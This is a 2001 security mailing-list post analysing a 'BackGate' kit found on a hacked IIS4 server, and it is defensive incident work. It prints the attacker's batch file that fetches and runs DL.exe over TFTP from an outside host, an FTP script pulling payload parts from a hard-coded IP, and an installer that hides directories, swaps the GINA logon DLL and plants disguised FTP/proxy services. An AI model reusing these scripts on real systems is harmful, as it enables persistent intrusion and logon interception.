Security Incidents mailing list archives
FW: I've been hacked! [BackGate Kit]
From: Matt Scarborough <vexversa () USA NET>
Date: Tue, 20 Feb 2001 18:14:51 EST
Moderator: Incidents, Forensics, or the bit bucket, whatever you like. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + FW: I've been hacked!! + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ On Mon, 19 Feb 2001 22:21:51 -0500, "Larry K." wrote I am fairly new to security issues, but I am very experienced with Windows. Today I found that somone broke into my NT 4.0 server. It is running IIS 4 for an internal web page and someone copied some files to my scripts directory. They were able to execute a file called dl.exe that was hogging all of my CPU cycles. I found that I had not removed anonymous access and access from the outside. Can anyone help me find out how they got in and make sure that they can't get back in? Any help would be appreciated. Here is a list of the file names: 00.d dl.bat dl.exe ftpcmds.txt dl.bat contains the following: @echo off cd \Inetpub\scripts startDL: tftp.exe -i web004.2coolweb.com get DL.exe if not exist DL.exe goto startDL start /w DL.exe ren 00.D install.bat attrib TFTP* -r attrib DL.exe -r del TFTP* del DL.exe install.bat %1 exit ftpcmds.txt contains the following: open 216.205.125.115 29292 user DL DL get 00.D get 01.D get 02.D get 03.D get 04.D get 05.D get 06.D get 07.D get 08.D get 09.D get 10.D get 11.D get 12.D get 13.D bye ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + END FW: I've been hacked!! + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ While this doesn't shed much light on how Larry K, was hacked, it illustrates the results of leaving IIS un-hardened. I ambled over to tftp://63.84.169.1:69 (web004.2coolweb.com) for DL.EXE, and then to ftp://DL@216.205.125.115:29292 (115-216.205.125.dellhost.com) for the BackGate kit that was downloaded to Larry's IIS4 box. Below is what I found. Creates a Warez repository and FTP Proxy. No response to attempts at contacting host owners or upstream of the (T)FTP site(s) distributing malware. Matt 2001-02-20 Text strings courtesy of BinText by Robin Keir http://www.foundstone.com UPX is The Ultimate Packer for eXecutables http://upx.tsx.org ===================== Contents of DL.EXE tftp from 63.84.169.1 ===================== UPX 1.02 contents Un-packed 00001C10 00401C10 0 wininet.dll 00001C20 00401C20 0 FtpGetFileA 00001C64 00401C64 0 FtpPutFileA 00001CA8 00401CA8 0 FtpSetCurrentDirectoryA 00001D08 00401D08 0 InternetOpenA 00001D50 00401D50 0 InternetConnectA 00001F70 00401F70 0 FtpOpenFileA 00001FB8 00401FB8 0 FtpDeleteFileA 000016DF 004016DF 0 @*\AZ:\FTPInstFileDL\Project1.vbp 000019D4 004019D4 0 vb wininet 00001CC4 00401CC4 0 /05.D 00002144 00402144 0 216.205.125.115 00002174 00402174 0 /00.D 00002194 00402194 0 /01.D 000021B4 004021B4 0 /02.D 000021D4 004021D4 0 /03.D 000021F4 004021F4 0 /04.D 00002224 00402224 0 /06.D 00002244 00402244 0 /07.D 00002264 00402264 0 /08.D 00002284 00402284 0 /09.D 000022A4 004022A4 0 /10.D 000022C4 004022C4 0 /11.D 000022E4 004022E4 0 /12.D 00002304 00402304 0 /13.D =====EoF===== ================ Contents of 00.D ================ @echo off echo Renaming Files ren 01.D dir.txt ren 02.D FireDaemon.exe ren 03.D login.txt ren 04.D MMtask.exe ren 05.D NewGina.dll ren 06.D reggina.exe ren 07.D regit.exe ren 08.D restrict.exe ren 09.D restsec.exe ren 10.D settings.reg ren 11.D SUD.exe ren 12.D makeini.exe ren 13.D SUD.ini echo Making ini .\makeini.exe %1 echo Making Dirs md %windir%\system32\os2\dll\new attrib %windir%\system32\os2\dll\new +s +h .\restrict.exe %windir%\system32\os2\dll\new md %1:\adminback0810\root attrib %1:\adminback0810\root +s +h .\restrict.exe %1:\adminback0810\root md %1:\adminback0810\root\system attrib %1:\adminback0810\root\system +s +h .\restrict.exe %1:\adminback0810\root\system md %1:\adminback0810\root\system\dll attrib %1:\adminback0810\root\system\dll +s +h .\restrict.exe %1:\adminback0810\root\system\dll echo Copying Files copy .\FireDaemon.exe %windir%\system32\os2\dll\new\ > nul: copy .\SUD.exe %windir%\system32\os2\dll\new\ > nul: copy .\SUD.bak %windir%\system32\os2\dll\new\ > nul: copy .\login.txt %windir%\system32\os2\dll\new\ > nul: copy .\dir.txt %windir%\system32\os2\dll\new\ > nul: copy .\MMtask.exe %windir%\system32\os2\dll\new\ > nul: copy .\newgina.dll %windir%\system32\ > nul: attrib %windir%\system32\newgina.dll +s +h echo Setting up Registry .\regit.exe .\settings.reg echo Installing Services set MXBIN=%windir%\system32\os2\dll\new set MXHOME=%windir%\system32\os2\dll\new %windir%\system32\os2\dll\new\Firedaemon.exe -i OS2SRV "%windir%\system32\os2\dll\new" "%windir%\system32\os2\dll\new\SUD.exe" "" Y 0 0 N Y %windir%\system32\os2\dll\new\Firedaemon.exe -i MMTASK "%windir%\system32\os2\dll\new" "%windir%\system32\os2\dll\new\MMtask.exe" "" Y 0 0 N Y .\reggina.exe echo Waiting 5 sec. .\restsec.exe 5 echo Starting Services net start os2srv net start mmtask echo Services Installed and Started echo Deleting Install-Files del FireDaemon.exe del makeini.exe del SUD.exe del SUD.ini del SUD.bak del login.txt del dir.txt del MMtask.exe del newgina.dll del restrict.exe del regit.exe del settings.reg del reggina.exe del restsec.exe attrib E.asp -r del E.asp del dl.bat del install.bat =====EOF===== ================ Contents of 01.D DIR.TXT ================ --- %ServerKBps KBps Current bandwith used %Dfree MB free --- =====EoF===== ================ Contents of 02.D FIREDAEMON.EXE ================ UPX 1.02 contents Un-packed File pos Mem pos ID Text ======== ======= == ==== 0000E2AC 0040E2AC 0 v0.09c 0000E2B4 0040E2B4 0 (c) 1999-2000 Sublime Solutions 0000E2D5 0040E2D5 0 Usage: 0000E2E0 0040E2E0 0 [-i <ServiceName> <AppDir> 0000E2FC 0040E2FC 0 [[AppName] [AppOpts] [Restart] [Mask] [Priority] [Interact] [Autostart]] 0000E51E 0040E51E 0 Purpose: 0000E528 0040E528 0 allows Win32 applications to be installed as 0000E556 0040E556 0 a Windows NT/2K service. The service can be run as the System Account 0000E5A5 0040E5A5 0 or as an NT/2K domain account. 0000F05C 0040F05C 0 URL: http://www.firedaemon.com/ 0000F083 0040F083 0 Bugs: Please report bugs to support () firedaemon com =====EoF===== ================ Contents of 03.D LOGIN.TXT ================ --- Running for: %ServerDays Days, %ServerHours Hours, %ServerMins Minutes and %ServerSecs Seconds --- %ServerKbUp Kilobytes uploaded in %ServerFilesUp Files %ServerKbDown Kilobytes downloaded in %ServerFilesDown Files %ServerAvg KBps Average bandwith used %Uall User(s) connected since server start %UNow User(s) currently connected =====EoF===== ================ Contents of 04.D WG3ENG9X.EXE ================ UPX 1.02 contents Un-packed 000DC38A 004E398A 0 VS_VERSION_INFO 000DC434 004E3A34 0 WinGate 3.0 Engine for Windows 9X 000DC4F4 004E3AF4 0 WinGate Engine 000DC51A 004E3B1A 0 FileVersion 000DC534 004E3B34 0 1, 0, 1, 4 000DC582 004E3B82 0 LegalCopyright 000DC5B6 004E3BB6 0 1998 Qbik New Zealand Limited 000DC61C 004E3C1C 0 WinGate (TM) 000DC63E 004E3C3E 0 OriginalFilename 000DC660 004E3C60 0 WG3ENG9X.EXE =====EoF===== ================ Contents of 05.D NEWGINA.DLL ================ Export Table Name: NEWGINA.dll Characteristics: 00000000 Time Date Stamp: 38642141 Version: 0.00 =====EoF===== ================ Contents of 06.D REGGINA.EXE ================ File pos Mem pos ID Text ======== ======= == ==== 00004348 00404348 0 Microsoft Visual C++ Runtime Library 000050B4 004050B4 0 System\CurrentControlSet\Services\OS2srv 000050E0 004050E0 0 DisplayName 000050EC 004050EC 0 MMtask 000050F4 004050F4 0 System\CurrentControlSet\Services\MMtask 00005120 00405120 0 MSgina.dll 0000512C 0040512C 0 newgina.dll 00005138 00405138 0 OriginalGinaDLL 00005148 00405148 0 GinaDLL 00005150 00405150 0 Software\Microsoft\Windows NT\CurrentVersion\Winlogon =====EoF===== ================ Contents of 07.D REGEDIT.EXE ================ 00009548 00409548 0 Compressed by Petite (c)1999 Ian Luck. 0000F7A6 0041ABA6 0 VS_VERSION_INFO 0000F96A 0041AD6A 0 Microsoft Corp. 1993-1995 0000F8EC 0041ACEC 0 4.00.1111 REGEDIT.EXE =====EoF===== ================ Contents of 08.D REGIT.EXE ================ 000000C8 004000C8 0 Compressed by Petite (c)1999 Ian Luck. Import Table ADVAPI32.dll Ordinal Function Name 0000 AddAce =====EoF===== ================ Contents of 09.D RESTSEC.EXE ================ IDW tools File pos Mem pos ID Text ======== ======= == ==== 00006620 06069220 0 Copyright (C) Microsoft Corp. 1981-1996 00006676 06069276 0 OriginalFilename 00006698 06069298 0 Sleep.Exe and Beep.Exe 000066CE 060692CE 0 ProductName 000066E8 060692E8 0 Microsoft(R) Windows NT(TM) Operating System =====EoF===== ================ Contents of 10.D REGEDIT 4 format SETTINGS.REG ================ <lots snipped> [HKEY_LOCAL_MACHINE\SOFTWARE\Qbik Software\WinGate\Services\FTP Proxy server] "ServiceType"="CFTPService" "Name"="FTP Proxy server" "Description"="FTP Proxy server" "PortNumber"=dword:0000243b "Enabled"=dword:00000001 "TimeOutSessions"=dword:00000001 "SessionTimeout"=dword:00000258 "SpecificBinding"="127.0.0.1" "SOCKS4Password"="" "BypassProxyOnLocal"=dword:00000000 =====EoF===== ================ Contents of 11.D SUD.EXE ================ UPX 1.02 contents Un-packed File pos Mem pos ID Text ======== ======= == ==== 0014DFE0 0054F5E0 0 Serv-U FTP Server v3.0 build 9 - Copyright (c) 1995-2001 Cat Soft, All Rights Reserved - by Rob Beckers 00178954 00582754 2075 This trial version of Serv-U is out-of-date! All domains are offline =====EoF===== ================ Contents of 12.D MAKEINI.EXE ================ Project1.exe Import Table MSVBVM60.DLL Ordinal Function Name 0000 MethCallEngine 0000 EVENT_SINK_AddRef ================ Contents of 13.D SUD.INI ================ [GLOBAL] TryOut=Full Version=3.0.0.7 LocalSetupPassword=<snipped> LocalSetupPortNo=45092 DirCacheSize=60 PacketTimeOut=120 [DOMAINS] Domain1=0.0.0.0||19216|Psychotic|1 [Domain1] LogSystemMes=0 LogSecurityMes=0 LogGETs=0 LogPUTs=0 LogFileSystemMes=0 LogFileSecurityMes=0 LogFileGETs=0 LogFilePUTs=0 ReplyHello=PsychoticDreams ReplyHelp=Help yourself. ReplyNoAnon=no ANONYMOUS. ReplyNoCredit=Upload some more. ReplySYST=guess ReplyTooMany=User limit reached. ReplyDown=Server going offline. ReplyOffline=Server offline. DirChangeMesFile=C:\winnt\system32\os2\dll\new\dir.txt User1=AdminIt|1 User2=MistarZet|1 User3=Tectonic|1 User4=nevermind|1 User5=Unibomber|1 User6=Nicodeimous|1 User7=Catie|1 User8=Mantis|1 User9=Pr0vit0|1 User10=X-Man|1 User11=FXskater|1 User12=delon15|1 User13=BigPun|1 User14=tafkamk|0 User15=Vegeetz|0 User16=Corsair|0 User17=palmleaf|0 User18=polux|0 User19=Termin-X|0 User20=NextLev|0 User21=X-byte|0 User22=XTracer|0 User23=Hooterman|0 User24=Section|0 User25=nightreg|0 User26=AssOnFire|0 User27=ZeroCode|0 User28=thunderbolt|0 <snipped> =====EoF===== ____________________________________________________________________ Get free email and a permanent address at http://www.amexmail.com/?A=1
Current thread:
- FW: I've been hacked! [BackGate Kit] Matt Scarborough (Feb 20)